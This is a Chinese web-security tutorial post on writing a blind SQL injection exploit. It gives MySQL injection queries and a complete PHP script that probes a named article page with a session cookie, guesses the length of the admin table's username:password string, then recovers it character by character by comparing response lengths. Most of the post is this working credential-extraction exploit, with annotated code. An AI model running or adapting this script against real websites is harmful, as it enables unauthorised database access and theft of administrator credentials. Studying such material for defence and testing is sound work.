[原创]WEB安全第七章 exp编写篇07 盲注入exp编写
WEB安全第七章 exp编写篇07 盲注入exp编写
1、 简介
在前几节课中,介绍了简单的注入exp编写,那是根据注入的payload匹配网页内容得到注入数据,这种方式只能应用于简单的注入。盲注入要复杂一些,但原理也差不多。
2、 盲注入原理
mysql的盲注入语句
得到表里的帐号和密码的长度
select * from article where id=1 and LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38
根据长度再判断每一位字符的ascii码
select * from article where id=1 and ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=97
3、 编写exp
原理就是先得到数据的长度,再逐位遍历每一个字符的ascii码,最后把ascii码转为字符。
为什么不直接用字符?因为目标使用的PHP版本会开启gpc(magic_quotes_gpc),单引号会被转义。
[php]
<?php
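//Thin cURL wrapper used by the rest of the script.
//Parameters: $url - URL to fetch; $post - POST fields (an array, or an already
//encoded string; empty/falsey means a GET request); $cookie - value for the
//Cookie header (skipped when empty); $returnCookie - when truthy the response
//headers are kept and the result is an array with 'cookie' (first Set-Cookie
//value) and 'content' (body) keys.
//Returns the response body as a string (or the array above), or the cURL error
//message as a string when the transfer fails - callers that compare lengths
//should keep that last case in mind.
function curl_request($url, $post = '', $cookie = '', $returnCookie = 0){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
    if($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        //http_build_query() only accepts arrays/objects; pass a pre-encoded string through as-is.
        curl_setopt($curl, CURLOPT_POSTFIELDS, is_array($post) ? http_build_query($post) : $post);
    }
    if($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $data = curl_exec($curl);
    if (curl_errno($curl)) {
        //Read the message first, then release the handle on the error path as well
        //(the original returned without closing it).
        $error = curl_error($curl);
        curl_close($curl);
        return $error;
    }
    curl_close($curl);
    if($returnCookie){
        //NOTE(review): with CURLOPT_FOLLOWLOCATION every hop's header block is
        //included in $data, so this split isolates only the first one - confirm
        //whether redirects matter to callers.
        $parts = explode("\r\n\r\n", $data, 2);
        $header = $parts[0];
        $body = isset($parts[1]) ? $parts[1] : '';
        preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
        $info = array();
        //substr(..., 1) drops the leading character (normally the space after the
        //colon); guard against a response with no Set-Cookie header at all.
        $info['cookie'] = isset($matches[1][0]) ? substr($matches[1][0], 1) : '';
        $info['content'] = $body;
        return $info;
    }else{
        return $data;
    }
}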
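//Determine the length of the concatenated username:password string.
//Appends a LENGTH(...) = N condition to the URL for N = 1, 2, 3, ... and stops
//at the first N whose response body has the same byte length as the baseline.
//Parameters: $url - the URL being probed; $cookie - session cookie forwarded
//to exploit(); $html - the baseline (unmodified) response body.
//Returns the matched length. There is no upper bound on $i: if no response
//ever matches the baseline size (dynamic page content, an error body from
//curl_request(), filtering) the loop never terminates.
//True/false is decided purely by strlen(), so any variable content in the
//page defeats the comparison. From the server side the probe is a burst of
//requests to one URL differing only in the trailing numeric comparison.
function getstrlen($url, $cookie, $html){
    $data_len = '';
    $i = 1;
    while(true){
        $s = "%20and%20LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i}";
        $urlexp = $url.$s;
        //Same-size response means the appended condition was true.
        if (strlen($html) == strlen(exploit($urlexp, $cookie))){
            $data_len = $i;
            break;
        }
        $i++;
    }
    return $data_len;
}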
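//Fetch one URL with the session cookie and return the raw response body.
//Plain wrapper around curl_request() (GET, no POST data). Note that on a
//transfer failure curl_request() returns its error message as a string, which
//the callers then compare by length like any other body.
function exploit($url, $cookie){
    $html = curl_request($url, '', $cookie);
    return $html;
}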
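//Recover the string one character at a time. For every position $i it tries
//each ASCII code 1..125 in an ascii(substring(...)) = $j condition and keeps
//the code whose response length equals the baseline. (The original comment at
//this point just read "38", the example length from the LENGTH() query in the
//text above.) Codes are compared numerically rather than as quoted literals
//because, as the write-up notes, the target escapes single quotes (gpc).
//Parameters: $url - the URL being probed; $cookie - session cookie;
//$datalen - number of characters to recover (from getstrlen()); $tmp_html -
//baseline response body.
//Returns the recovered string; each partial result is also echoed as it grows.
//A position with no match in 1..125 is silently skipped, so the result can be
//shorter than $datalen.
function get_data($url, $cookie, $datalen, $tmp_html){
    $admin_pass = '';
    for($i = 1; $i <= $datalen; $i++){
        for($j = 1; $j <= 125; $j++){
            $s = "%20and%20ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j}";
            if(strlen($tmp_html) == strlen(exploit($url.$s, $cookie))){
                $c = chr($j);
                $admin_pass .= $c;
                echo $admin_pass."\r\n";
                break;
            }
        }
    }
    return $admin_pass;
}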
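//Script entry point: session cookie and URL used in the write-up (values as published).
$cookie = 'PHPSESSID=bn43dma24ghqeuosagkqj9ib45';
$url = 'http://www.moontester.com/article.php?id=1';
//One unmodified fetch, kept as the baseline every later response is compared against.
$tmp_html = exploit($url, $cookie);
$datalen = getstrlen($url, $cookie, $tmp_html);
//getstrlen() only returns after a match (otherwise it keeps looping), so the
//else branch is effectively unreachable.
if ($datalen){
    echo get_data($url, $cookie, $datalen, $tmp_html);
}else{
    echo "data null";
}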
[/php]
运行截图
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/558.html